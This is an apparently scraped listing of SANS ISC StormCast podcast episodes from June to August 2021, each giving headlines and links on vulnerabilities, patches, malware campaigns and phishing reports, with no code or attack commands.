Waiting for the C2 to Show Up https://isc.sans.edu/forums/diary/Waiting+for+the+C2+to+Show+Up/27772/ DOCX with Embedded EXE https://isc.sans.edu/forums/diary/docx+With+Embedded+EXE/27776/ Securing Your Windows 365 Cloud PCs https://techcommunity.microsoft.com/t5/windows-it-pro-blog/securing-your-windows-365-cloud-pcs/ba-p/2663129 Pegasus Fraud Scam https://www.ehackingnews.com/2021/08/pegasus-iphone-hacks-used-as-bait-in.html Proper Audit Logging for Office 365 https://zolder.io/office-365-audit-logging/
8/23/2021, 5 minutes, 10 seconds
ISC StormCast for Friday, August 20th, 2021

When Lightning Strikes: What Works and Doesn't Work https://isc.sans.edu/forums/diary/When+Lightning+Strikes+What+works+and+doesnt+work/27766/ Cisco Small Business Router Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cisco-sb-rv-overflow-htpymMB5 Blackberry QNX Products Vulnerability https://support.blackberry.com/kb/articleDetail?articleNumber=000082334 SANS.edu Student Mark Morowczynski: Decreasing Attacker Dwell Time in Azure Active Directory https://www.sans.org/white-papers/40390/
8/20/2021, 15 minutes, 17 seconds
ISC StormCast for Thursday, August 19th, 2021

5 Things to Consider Before Moving Back to the Office https://isc.sans.edu/forums/diary/5+Things+to+Consider+Before+Moving+Back+to+the+Office/27762/ Adobe Patches https://helpx.adobe.com/security.html Several Web Sites Infected with Chinese Spyware https://imp0rtp3.wordpress.com/2021/08/12/tetris/ Trickbot Tricks Users with 1Password https://www.ehackingnews.com/2021/08/trickbot-employs-bogus-1password.html
8/19/2021, 4 minutes, 52 seconds
ISC StormCast for Wednesday, August 18th, 2021

Laravel Exploit Attempts Targeting Vulnerability in "Ignition" https://isc.sans.edu/forums/diary/Laravel+v842+exploit+attempts+for+CVE20213129+debug+mode+Remote+code+execution/27758/ ThroughTek "Kalay" Protocol Vulnerability https://www.fireeye.com/blog/threat-research/2021/08/mandiant-discloses-critical-vulnerability-affecting-iot-devices.html Fortinet FortiWeb Vulnerability https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/
8/18/2021, 6 minutes, 14 seconds
Episode Artwork

ISC StormCast for Tuesday, August 17th, 2021

Triage of Malware Bazaar's Daily Malware Batches https://isc.sans.edu/forums/diary/Extra+Tip+For+Triage+Of+MALWARE+Bazaars+Daily+Malware+Batches/27754/ Realtek SDK Vulnerability https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/ https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf STARTTLS Vulnerabilities https://www.usenix.org/conference/usenixsecurity21/presentation/poddebniak Raccoon Infostealer Self Infection https://mobile.twitter.com/HRock/status/1427259563363950596
8/17/2021, 5 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, August 16th, 2021

Exchange E-Discovery Scans https://isc.sans.edu/forums/diary/Scanning+for+Microsoft+Exchange+eDiscovery/27748/ Danabot Distributed Through Malspam https://isc.sans.edu/forums/diary/Example+of+Danabot+distributed+through+malspam/27744/ Weaponizing Middleboxes https://geneva.cs.umd.edu/posts/usenix21-weaponizing-censors/ https://www.usenix.org/conference/usenixsecurity21/presentation/bock Deep Blue Magic Ransomware https://www.ehackingnews.com/2021/08/deepbluemagic-newly-discovered.html
8/16/2021, 5 minutes, 49 seconds
Episode Artwork

ISC StormCast for Friday, August 13th, 2021

Print Nightmare Continues: CVE-2021-36958 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958 Print Nightmare Abused by Ransomware Gangs https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/ PolyNetwork Attack https://www.theregister.com/2021/08/10/poly_networks_cryptocurrency_theft/
8/13/2021, 3 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, August 12th, 2021

TA551 Shathak Continues Pushing BazarLoader Leading to Cobalt Strike https://isc.sans.edu/forums/diary/TA551+Shathak+continues+pushing+BazarLoader+infections+lead+to+Cobalt+Strike/27738/ New AdLoad Campaign Goes Undetected by XProtect https://labs.sentinelone.com/massive-new-adload-campaign-goes-entirely-undetected-by-apples-xprotect/ Android FlyTrap Malware Hitting Facebook Users https://www.ehackingnews.com/2021/08/android-malware-flytrap-hacks-facebook.html 5G Shortcuts Allow Eavesdropping https://www.wired.com/story/5g-network-stingray-surveillance-non-standalone/ Cloud DNS Service Weaknesses https://www.wiz.io/blog/black-hat-2021-dns-loophole-makes-nation-state-level-spying-as-easy-as-registering-a-domain
8/12/2021, 5 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, August 11th, 2021

Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+August+2021+Patch+Tuesday/27736/ Adobe Patches https://helpx.adobe.com/security.html cPanel/WHM Vulnerabilities https://www.fortbridge.co.uk/research/multiple-vulnerabilities-in-cpanel-whm/ Firefox Update Released https://www.mozilla.org/en-US/firefox/91.0/releasenotes/
8/11/2021, 5 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, August 10th, 2021

Microsoft Exchange ProxyShell https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/ Synology Warns of Brute Force Attacks https://www.synology.com/en-global/company/news/article/BruteForce/Synology%20Investigates%20Ongoing%20Brute-Force%20Attacks%20From%20Botnet Router Auth Bypass https://threatpost.com/auth-bypass-bug-routers-exploited/168491/ Firefox Version 100 Experiment https://bugzilla.mozilla.org/show_bug.cgi?id=1719070 Interaction Less Vulnerabilities in Messaging Apps https://www.ehackingnews.com/2021/08/the-interaction-less-flaws-in-messaging.html HTTP2 Vulnerabilities https://portswigger.net/research/http2#conclusion
8/10/2021, 5 minutes, 50 seconds
Episode Artwork

ISC StormCast for Monday, August 9th, 2021

Malicious Microsoft Word Remains A Key Infection Vector https://isc.sans.edu/forums/diary/Malicious+Microsoft+Word+Remains+A+Key+Infection+Vector/27716/ Malware Bazaar Daily Download https://isc.sans.edu/forums/diary/MALWARE+Bazaar+Download+daily+malware+batches/27728/ Go/Rust IP Address Validation Vulnerability https://github.com/rust-lang/rust/pull/83652 Facial Recognition "Master Keys" https://arxiv.org/pdf/2108.01077.pdf Pulse Secure Patch Bypass https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858 Hadoop ResourceManager Vulnerability Exploited https://blog.netlab.360.com/wei-xie-kuai-xun-teamtntxin-huo-dong-tong-guo-gan-ran-wang-ye-wen-jian-ti-gao-chuan-bo-neng-li/
8/9/2021, 5 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, August 6th, 2021

Cisco Patches Unauthenticated RCE in RV340/345 devices https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy Telegram Flawed Self Destruct in MacOS https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/telegram-self-destruct-not-always/ Significant Vulnerabilities in MacOS Privacy Protections https://www.darkreading.com/application-security/researchers-find-significant-vulnerabilities-in-mac-os-privacy-protections Windows Hello Bypass https://threatpost.com/microsofts-patch-windows-hello-faulty/168392/ STI Student: James Casteel; Content Security Policy Bypass: Exploiting Misconfigurations https://www.sans.org/white-papers/40380
8/6/2021, 15 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, August 5th, 2021

Pivoting and Hunting for Shenanigans from a Reported Phishing Domain https://isc.sans.edu/forums/diary/Pivoting+and+Hunting+for+Shenanigans+from+a+Reported+Phishing+Domain/27710/ NicheStack TCP/IP Vulnerabilities https://jfrog.com/blog/infrahalt-14-new-security-vulnerabilities-found-in-nichestack/ Securing the Cloud https://www.sans.org/newsletters/ouch/securely-using-the-cloud/ Lockbit Recruiting Insiders https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/ Sneaky Phishing Hitting Office 365 Users https://www.ehackingnews.com/2021/08/microsoft-warns-office-365-users-of.html
8/5/2021, 5 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, August 4th, 2021

2FA Issues https://isc.sans.edu/forums/diary/Three+Problems+with+Two+Factor+Authentication/27704/ Crazy Smishing https://isc.sans.edu/forums/diary/Is+this+the+Weirdest+Phishing+SMishing+Attempt+Ever/27706/ Google Chrome Update https://chromereleases.googleblog.com/2021/08/the-stable-channel-has-been-updated-to.html https://www.bleepingcomputer.com/news/google/google-chrome-to-no-longer-show-secure-website-indicators/ Google Android Update https://source.android.com/security/bulletin/2021-08-01?hl=en DoD/NSA Publishes Kubernetes Hardening Guides https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF
8/3/2021, 5 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, August 3rd, 2021

Unsolicited DNS Queries https://isc.sans.edu/forums/diary/Unsolicited+DNS+Queries/27694/ Changing BAT Files on the Fly https://isc.sans.edu/forums/diary/Changing+BAT+Files+On+The+Fly/27700/ Empty NPM Package has Over 700,000 Downloads https://www.bleepingcomputer.com/news/software/empty-npm-package-has-over-700-000-downloads-heres-why/ Blocking PetitPotam with netsh RPC Filters https://twitter.com/gentilkiwi/status/1421949715986403329 Pneumatic Tube Vulnerabilities https://www.blackhat.com/us-21/briefings/schedule/index.html#a-hole-in-the-tube-uncovering-vulnerabilities-in-critical-infrastructure-of-healthcare-facilities-23546
8/3/2021, 6 minutes, 12 seconds
Episode Artwork

ISC StormCast for Sunday, August 1st, 2021

Infected With a .reg File https://isc.sans.edu/forums/diary/Infected+With+a+reg+File/27692/ Excessive Exchange Permissions (Patched) https://bugs.chromium.org/p/project-zero/issues/detail?id=2186 Node.js July 2021 Security Releases https://nodejs.org/en/blog/vulnerability/july-2021-security-releases-2/ Malicious PyPI Packages https://jfrog.com/blog/malicious-pypi-packages-stealing-credit-cards-injecting-code/ REvil / Darkside May be Back as Blackmatter https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/
8/1/2021, 5 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, July 30th, 2021

Malicious Content Delivered Through archive.org https://isc.sans.edu/forums/diary/Malicious+Content+Delivered+Through+archiveorg/27688/ A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI https://arxiv.org/abs/2107.12699 Crimea "manifesto" deploys VBA RAT using double attack vectors https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/
7/30/2021, 5 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, July 29th, 2021

A Sextortion E-Mail From ... IT Support?! https://isc.sans.edu/forums/diary/A+sextortion+email+fromIT+support/27682/ AV-Test Compares Android Anti-Virus Software https://www.av-test.org/en/news/15-security-apps-for-android-in-an-endurance-test/ Oscorp evolves into UBEL: Advanced Android Malware https://www.cleafy.com/cleafy-labs/ubel-oscorp-evolution QOMPLX Reboots Punkspider https://www.globenewswire.com/da/news-release/2021/07/20/2265860/0/en/QOMPLX-Reboots-Punkspider.html AFRINIC IPv4 Address Heist https://lists.afrinic.net/pipermail/community-discuss/2021-July/004122.html
7/29/2021, 8 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, July 28th, 2021

Details about CVE-2021-30807. (Patch released Monday for MacOS/iOS) https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/ Zimbra 8.8.15 XSS and SSRF Vulnerability https://blog.sonarsource.com/zimbra-webmail-compromise-via-email LockBit Ransomware Uses Group Policies https://www.bleepingcomputer.com/news/security/lockbit-ransomware-automates-windows-domain-encryption-via-group-policies/ Microsoft Extending SafeLinks to Teams https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/microsoft-teams-gets-more-phishing-protection/ba-p/2585559
7/28/2021, 6 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, July 27th, 2021

Recovering Malspam Password https://isc.sans.edu/forums/diary/Failed+Malspam+Recovering+The+Password/27674/ Apple Patches 0-Day https://support.apple.com/en-us/HT201222 Attackers Adopt Exotic Programming Languages https://blogs.blackberry.com/en/2021/07/old-dogs-new-tricks-attackers-adopt-exotic-programming-languages LemonDuck/LemonCat Coinminers Going Multi-OS https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/ GitHub Expanding Supply Chain Security Support to Go https://github.blog/2021-07-22-github-supply-chain-security-features-go-community/
7/27/2021, 6 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, July 26th, 2021

PetitPotam ADCS Domain Admin Vulnerability https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/ XCSSET Mac Malware Targets Google Chrome / Telegram https://thehackernews.com/2021/07/nasty-macos-malware-xcsset-now-targets.html Defunct Video Hosting Site Flooding Normal Websites With Porn https://www.vice.com/en/article/qj8xz3/a-defunct-video-hosting-site-is-flooding-normal-websites-with-hardcore-porn
7/26/2021, 6 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, July 23rd, 2021

Akamai Outage https://isc.sans.edu/forums/diary/Lost+in+the+Cloud+Akamai+DNS+Outage/27660/ "Summer of SAM" Continues https://isc.sans.edu/forums/diary/Summer+of+SAM+Microsoft+Releases+Guidance+for+CVE202136934/27656/ Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpujul2021.html Kaseya Decryptor Available https://www.kaseya.com/potential-attack-on-kaseya-vsa/ Jira Data Center and Jira Service Management Data Center Security Advisory https://confluence.atlassian.com/adminjiraserver/jira-data-center-and-jira-service-management-data-center-security-advisory-2021-07-21-1063571388.html Forgot password? Taking over user accounts Kaminsky style https://sec-consult.com/blog/detail/forgot-password-taking-over-user-accounts-kaminsky-style/
7/23/2021, 6 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, July 22nd, 2021

Microsoft Published Summer of SAM Guidance https://isc.sans.edu/forums/diary/Summer+of+SAM+Microsoft+Releases+Guidance+for+CVE202136934/27656/ Apple Patches Everything https://support.apple.com/en-us/HT201222 Formbook/XLoader Malware Ported to Mac https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/ Pulse Secure Backdoors https://us-cert.cisa.gov/ncas/current-activity/2021/07/21/malware-targeting-pulse-secure-devices
7/22/2021, 6 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, July 21st, 2021

Windows Registry Hives Permission Problem https://isc.sans.edu/forums/diary/Summer+of+SAM+incorrect+permissions+on+Windows+1011+hives/27652/ HP Printer Drivers Allow Privilege Escalation https://labs.sentinelone.com/cve-2021-3438-16-years-in-hiding-millions-of-printers-worldwide-vulnerable/ Linux Local Privilege Escalation in Filesystem Layer https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909 FortiManager and FortiAnalyzer Vulnerability https://www.fortiguard.com/psirt/FG-IR-21-067
7/21/2021, 7 minutes
Episode Artwork

ISC StormCast for Tuesday, July 20th, 2021

New Windows Print Spooler Vulnerability - CVE-2021-34481 https://isc.sans.edu/forums/diary/New+Windows+Print+Spooler+Vulnerability+CVE202134481/27648/ iOS/WatchOS/tvOS/Safari Updates https://support.apple.com/en-us/HT201222 iOS Format String Vulnerability Exploitable as RCE https://blog.zecops.com/research/meet-wifidemon-ios-wifi-rce-0-day-vulnerability-and-a-zero-click-vulnerability-that-was-silently-patched/ Surfside Condo Collapse Scams https://threatpost.com/attackers-target-florida-condo-collapse-victims/167917/
7/20/2021, 5 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, July 19th, 2021

Multiple BaseXX Obfuscations https://isc.sans.edu/forums/diary/Multiple+BaseXX+Obfuscations/27640/ Juniper Patches: Radius Vulnerability https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11180&cat=SIRT_1&actp=LIST fail2ban vulnerability https://github.com/fail2ban/fail2ban/security/advisories/GHSA-m985-3f3v-cwmm NSO Group Victims Leaked https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/ Dangers of Autofilling Passwords https://marektoth.com/blog/password-managers-autofill/#analysis
7/19/2021, 6 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, July 16th, 2021

USPS Phishing Kit Reporting Data Back Via Telegram https://isc.sans.edu/forums/diary/USPS+Phishing+Using+Telegram+to+Collect+Data/27630/ Sonicwall Warns of Ransomware https://www.sonicwall.com/support/product-notification/urgent-security-notice-critical-risk-to-unpatched-end-of-life-sra-sma-8-x-remote-access-devices/210713105333210/ WooCommerce Flaw Exploited https://www.wordfence.com/blog/2021/07/critical-sql-injection-vulnerability-patched-in-woocommerce/ KiwiSDR Backdoor https://www.bleepingcomputer.com/news/security/software-maker-removes-backdoor-giving-root-access-to-radio-devices/
7/16/2021, 5 minutes, 58 seconds
Episode Artwork

ISC StormCast for Thursday, July 15th, 2021

One way to fail at malspam - give reipients the wrong password https://isc.sans.edu/forums/diary/One+way+to+fail+at+malspam+give+recipients+the+wrong+password+for+an+encrypted+attachment/27634/ Firefox Updates https://www.mozilla.org/en-US/security/advisories/mfsa2021-28/ SAP Netweaver Vulnerabilities https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=580617506 Joker Android Fleezware https://blog.zimperium.com/joker-is-still-no-laughing-matter/ less.js RCE https://www.softwaresecured.com/exploiting-less-js
7/15/2021 5 minutes, 38 seconds

ISC StormCast for Wednesday, July 14th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+July+2021+Patch+Tuesday/27628/ Adobe Patch Tuesday https://helpx.adobe.com/security/products/acrobat/apsb21-51.html ForgeRock OpenAM Vulnerability https://backstage.forgerock.com/knowledge/kb/article/a47894244 GMail Supporting BIMI https://cloud.google.com/blog/products/identity-security/bringing-bimi-to-gmail-in-google-workspace
7/14/2021 6 minutes, 32 seconds

ISC StormCast for Tuesday, July 13th, 2021

Kaseya Releases Patch and Hardening Guide https://helpdesk.kaseya.com/hc/en-gb/articles/4403760102417 Solarwinds Advisory CVE-2021-35211 https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211 Mint Mobile Breach and Porting https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/ Twitter Verified Account Mistake https://twitter.com/conspirator0/status/1414475519609999366
7/13/2021 6 minutes, 4 seconds

ISC StormCast for Monday, July 12th, 2021

Scanning for Microsoft Secure Socket Tunneling Protocol https://isc.sans.edu/forums/diary/Scanning+for+Microsoft+Secure+Socket+Tunneling+Protocol/27622/ Hancitor tries XLL as Initial Malware File https://isc.sans.edu/forums/diary/Hancitor+tries+XLL+as+initial+malware+file/27618/ Android Updates https://source.android.com/security/bulletin/2021-07-01 Cisco Updates https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-bpa-priv-esc-dgubwbH4 Job Seekers Attacked with Malicious Documents https://www.ehackingnews.com/2021/07/job-seeking-engineers-have-become.html
7/12/2021 5 minutes, 36 seconds

ISC StormCast for Friday, July 9th, 2021

Using Sudo With Python For More Security Controls https://isc.sans.edu/forums/diary/Using+Sudo+with+Python+For+More+Security+Controls/27614/ Fake Kaseya Updates Include CobaltStrike Payload https://www.theregister.com/2021/07/07/kaseya_malware_patches_/ WildPressure macOS Trojan https://www.kaspersky.com/about/press-releases/2021_wildpressures-multi-platform-malware-hits-macos-in-the-middle-east https://www.patreon.com/posts/53462690 iCloud Password Reset Weakness https://thezerohack.com/apple-vulnerability-bug-bounty
7/9/2021 5 minutes, 33 seconds

ISC StormCast for Thursday, July 8th, 2021

Microsoft Releases Patches for CVE-2021-34527 UPDATED https://isc.sans.edu/forums/diary/Microsoft+Releases+Patches+for+CVE202134527/27610/ GitLab Update https://www.ehackingnews.com/2021/07/gitlab-fixes-several-vulnerabilities.html Vulnerable NuGet Packages https://blog.secure.software/third-party-code-comes-with-some-baggage
7/8/2021 5 minutes, 55 seconds

ISC StormCast for Wednesday, July 7th, 2021

Microsoft Releases Printnightmare Patch https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 Kaseya Update https://www.kaseya.com/potential-attack-on-kaseya-vsa/ Kaspersky Password Manager https://donjon.ledger.com/kaspersky-password-manager/ Amazon Echo Dot After Reset Artifacts https://dl.acm.org/doi/pdf/10.1145/3448300.3467820
7/7/2021 8 minutes, 34 seconds

ISC StormCast for Tuesday, July 6th, 2021

Kaseya REvil Update https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689 https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b https://csirt.divd.nl/2021/07/03/Kaseya-Case-Update/ Printnightmare Update https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 https://doublepulsar.com/zero-day-for-every-supported-windows-os-version-in-the-wild-printnightmare-b3fdb82f840c https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/ https://github.com/LaresLLC/CVE-2021-1675 Expired RPM Key Problem https://github.com/rpm-software-management/rpm/issues/1598 Node.JS Update https://nodejs.org/en/blog/vulnerability/july-2021-security-releases/
7/6/2021 6 minutes, 39 seconds

ISC StormCast for Monday, July 5th, 2021

Kaseya VSA REvil Ransomware Incident https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689 https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b https://csirt.divd.nl/2021/07/03/Kaseya-Case-Update/
7/4/2021 5 minutes, 14 seconds

ISC StormCast for Friday, July 2nd, 2021

Print Spooler printnightmare Update https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 https://doublepulsar.com/zero-day-for-every-supported-windows-os-version-in-the-wild-printnightmare-b3fdb82f840c https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/ https://github.com/LaresLLC/CVE-2021-1675
7/2/2021 7 minutes, 42 seconds

ISC StormCast for Thursday, July 1st, 2021

CVE-2021-1675 Incomplete Patch - PrintNightmare https://isc.sans.edu/forums/diary/CVE20211675+Incomplete+Patch+and+Leaked+RCE+Exploit/27588/ Internet Explorer PDF Update https://support.microsoft.com/en-us/topic/june-29-2021-kb5004760-os-builds-19041-1082-19042-1082-and-19043-1082-out-of-band-9508f7a2-0713-432f-b06c-1ae6d802a2f7 NETGEAR Router Vulnerabilities (DGN-2200v1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
7/1/2021 6 minutes, 57 seconds

ISC StormCast for Wednesday, June 30th, 2021

Google "Sweepstake" Phish Without Link https://isc.sans.edu/forums/diary/Diving+into+a+Google+Sweepstakes+Phishing+Email/27578/ Forensics Contest Solution / Winner https://isc.sans.edu/forums/diary/June+2021+Forensic+Contest+Answers+and+Analysis/27582/ WD MyBook Details https://arstechnica.com/gadgets/2021/06/hackers-exploited-0-day-not-2018-bug-to-mass-wipe-my-book-live-devices/ Adobe Experience Manager PoC https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
6/30/2021 5 minutes, 53 seconds

ISC StormCast for Monday, June 28th, 2021

Increase in UDP Port 389 Scans (LDAP/AD) https://isc.sans.edu/forums/diary/Is+this+traffic+bAD/27566/ CD/DVD Destruction https://isc.sans.edu/forums/diary/DIY+CDDVD+Destruction/27572/ Zyxel Exploits https://twitter.com/JAMESWT_MHT/status/1407987022170578946 https://kb.zyxel.com/KB/searchArticle!viewDetail.action?articleOid=018137&lang=EN Cisco Vulnerability Exploited https://threatpost.com/cisco-asa-bug-exploited-poc/167274/ Microsoft Signs Netfilter Rootkit https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit
6/28/2021 6 minutes, 13 seconds

ISC StormCast for Friday, June 25th, 2021

Do You Like Cookies? Some are for sale! https://isc.sans.edu/forums/diary/Do+you+Like+Cookies+Some+are+for+sale/27558/ A supply-chain breach: Taking over an Atlassian account https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/23175805/Atlassian-ATO-CPR-blog-FINAL.pdf Dell Bios Connect Vulnerability https://eclypsium.com/2021/06/24/biosdisconnect/ ATM Jackpotting via NFC https://www.wired.com/story/atm-hack-nfc-bugs-point-of-sale/
6/25/2021 6 minutes, 20 seconds

ISC StormCast for Thursday, June 24th, 2021

DNS Name Server Hijack Attack https://www.darkreading.com/vulnerabilities---threats/new-dns-name-server-hijack-attack-exposes-businesses-government-agencies/d/d-id/1341377 Palo Alto Cortex XSOAR Vulnerability https://security.paloaltonetworks.com/CVE-2021-3044 VMware Carbon Black App Control Authentication Bypass https://www.vmware.com/security/advisories/VMSA-2021-0012.html Standing With Security Researchers Against Misuse of the DMCA https://www.eff.org/deeplinks/2021/06/dmca-security-researcher-statement
6/24/2021 6 minutes, 28 seconds

ISC StormCast for Wednesday, June 23rd, 2021

Phishing asking recipients not to report abuse https://isc.sans.edu/forums/diary/Phishing+asking+recipients+not+to+report+abuse/27556/ PyPi Cryptomining Malware https://blog.sonatype.com/sonatype-catches-new-pypi-cryptomining-malware-via-automated-detection Dovecot TLS Implementation Vulnerability https://hackerone.com/reports/1204962 (see the link to the PDF for more details) Sonicwall Patch Incomplete https://www.tripwire.com/state-of-security/featured/analyzing-sonicwalls-unsuccessful-fix-for-cve-2020-5135/
6/23/2021 6 minutes, 10 seconds

ISC StormCast for Tuesday, June 22nd, 2021

Attack and Defend: Distributed Web Applications (free Webcast) https://www.sans.org/webcasts/attack-defend-modern-distributed-applications-119610 Darkside Impersonators https://www.helpnetsecurity.com/2021/06/21/impersonating-darkside/ Tesla RAT COVID-19 Vaccination Phish https://threatpost.com/agent-tesla-covid-vax-phish/167082/ Tor Browser Update https://www.bleepingcomputer.com/news/security/tor-browser-fixes-vulnerability-that-tracks-you-using-installed-apps/ Schneider PowerLogic Vulnerabilities https://www.ehackingnews.com/2021/06/six-major-flaws-identified-in-schneider.html AutoCAD Update https://www.autodesk.com/trust/security-advisories/adsk-sa-2021-0004
6/22/2021 5 minutes, 28 seconds

ISC StormCast for Monday, June 21st, 2021

Network Forensics on Azure VMs (Part #2) https://isc.sans.edu/forums/diary/Network+Forensics+on+Azure+VMs+Part+2/27538/ Google Open Redirect Being Abused https://isc.sans.edu/forums/diary/Open+redirects+and+why+Phishers+love+them/27542/ Easy Access to the NIST RDS Database https://isc.sans.edu/forums/diary/Easy+Access+to+the+NIST+RDS+Database/27544/ iOS Wifi Bug https://blog.chichou.me/2021/06/20/quick-analysis-wifid/ NSA VoIP Security Guide https://media.defense.gov/2021/Jun/17/2002744054/-1/-1/1/CTR_DEPLOYING%20SECURE%20VVOIP%20SYSTEMS.PDF
6/21/2021 5 minutes, 40 seconds

ISC StormCast for Friday, June 18th, 2021

Network Forensics on Azure VMs https://isc.sans.edu/forums/diary/Network+Forensics+on+Azure+VMs+Part+1/27536/ Fake Ledger Hardware Wallets https://www.ledger.com/phishing-campaigns-status#phishing-campaigns https://www.reddit.com/r/ledgerwallet/comments/o154gz/package_from_ledger_is_this_legit/ Zoll Defibrillator Dashboard Vulnerability https://us-cert.cisa.gov/ics/advisories/icsma-21-161-01 Akamai Prolexic Outage https://threatpost.com/hiccup-akamais-ddos-outages/167004/
6/18/2021 5 minutes, 48 seconds

ISC StormCast for Thursday, June 17th, 2021

June 2021 Forensic Quiz https://isc.sans.edu/forums/diary/June+2021+Forensic+Contest/27532/ ThroughTek IP Camera SDK Vulnerability https://www.nozominetworks.com/blog/new-iot-security-risk-throughtek-p2p-supply-chain-vulnerability/ Peloton Insecure Boot Vulnerability https://www.mcafee.com/blogs/other-blogs/mcafee-labs/a-new-program-for-your-peloton-whether-you-like-it-or-not/ Microsoft Defender for Endpoint Detecting Jailbroken Devices https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-new-capabilities-on-android-and-ios/ba-p/2442730
6/17/2021 5 minutes, 26 seconds

ISC StormCast for Wednesday, June 16th, 2021

Multi Perimeter Device Exploit Mirai Version Hunting For Sonicwall, DLink, Cisco and more https://isc.sans.edu/forums/diary/Multi+Perimeter+Device+Exploit+Mirai+Version+Hunting+For+Sonicwall+DLink+Cisco+and+more/27528/ Google Open Sourcing Homomorphic Encryption Libraries https://developers.googleblog.com/2021/06/our-latest-updates-on-fully-homomorphic-encryption.html Stealing Tokens, emails, files and more in Microsoft Teams https://medium.com/tenable-techblog/stealing-tokens-emails-files-and-more-in-microsoft-teams-through-malicious-tabs-a7e5ff07b138
6/16/2021 6 minutes, 6 seconds

ISC StormCast for Tuesday, June 15th, 2021

Apple iOS 12.5.4 Security Update https://support.apple.com/en-us/HT212548 NIST.gov DNS Issues https://puck.nether.net/pipermail/outages/2021-June/013670.html Akkadian Provisioning Manager Multiple Vulnerabilities https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ Bypassing MFA in Exchange Online https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/
6/15/2021 5 minutes, 38 seconds

ISC StormCast for Monday, June 14th, 2021

